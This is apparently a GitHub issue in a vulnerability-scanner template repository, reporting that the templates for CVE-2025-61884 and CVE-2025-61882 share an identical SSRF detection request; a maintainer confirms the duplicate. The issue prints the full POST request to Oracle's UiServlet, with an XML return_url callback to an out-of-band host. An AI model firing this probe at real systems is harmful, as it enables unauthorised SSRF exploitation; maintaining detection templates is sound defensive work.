[ENHANCEMENT] CVE-2025-61884 and CVE-2025-61882

[daffainfo]

Is there an existing issue for this?

• I have searched the existing issues and discussions.

Enhancement Description

I saw both templates using the same request here:

http:
  - raw:
      - |
        POST /OA_HTML/configurator/UiServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
        <initialize>
          <param name="init_was_saved">{{to_lower(rand_text_alpha(6))}}</param>
          <param name="return_url">http://{{interactsh-url}}</param>
          <param name="ui_def_id">0</param>
          <param name="config_effective_usage_id">0</param>
          <param name="ui_type">Applet</param>
        </initialize>

This will cause confusion if there is same poc on 2 different cves, maybe the solution is to delete the ssrf poc on CVE-2025-61882

Use Case / Problem

N/A

Proposed Solution

No response

Alternatives Considered

No response

Additional Context

No response

[Akokonunes]

Hai @daffainfo

Thanks for reporting this duplicate POC issue!

After analysis, we can confirm both templates contain identical SSRF detection requests targeting /OA_HTML/configurator/UiServlet, which causes duplicate alerts.

Fix incoming shortly.